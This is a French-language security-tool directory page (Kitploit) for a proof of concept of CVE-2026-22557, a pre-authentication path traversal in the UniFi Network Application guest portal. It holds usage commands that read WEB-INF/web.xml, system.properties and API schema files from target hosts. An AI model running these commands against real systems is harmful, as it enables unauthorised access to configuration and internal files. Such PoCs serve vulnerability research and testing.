Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22557-PoC — PoC pour le contournement d'authentification par traversée de chemin dans UniFi Network Application (CVE-2026-22557) | Kitploit
Outils/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

PoC pour le contournement d'authentification par traversée de chemin dans UniFi Network Application (CVE-2026-22557)

Voir le dépôt
4il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22557 -- Traversée de chemin pré-authentification dans UniFi Network Application

Traversée de chemin pré-authentifiée dans le portail invité de l'application réseau UniFi (/guest/s/{site}/login). Le paramètre de requête page_error est transmis à un chargeur de ressources sans validation, permettant à un attaquant non authentifié de lire des fichiers depuis la webapp (par exemple WEB-INF/web.xml).

Si la page du portail invité a été personnalisée, le chargeur de ressources semble retomber sur une branche FileInputStream brute qui peut accéder à des fichiers arbitraires sur le système sous-jacent en dehors du contexte racine. Je n'ai pas encore confirmé cela et j'investiguerai plus en détail si j'ai le temps.

Utilisation

root@kitploit:~
pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
FlagDescriptionDéfaut
targetURL cible (par ex. https://host:8843)(requis)
-fChemin relatif à lire../../web.xml
-gChemin du portail invité/guest/s/default/login
-oÉcrire la réponse dans un fichier(stdout)
-xURL du proxy(aucun)

Exemples

image
root@kitploit:~
# Par défaut -- lire WEB-INF/web.xml (portail invité HTTPS)
python CVE-2026-22557.py https://192.168.1.1:8843

# Portail invité HTTP
python CVE-2026-22557.py http://192.168.1.1:8880

# Lire une ressource du classpath
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# Lire le schéma API et l'enregistrer dans un fichier
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# Nom de site différent
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# Via un proxy
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
Télécharger l’outil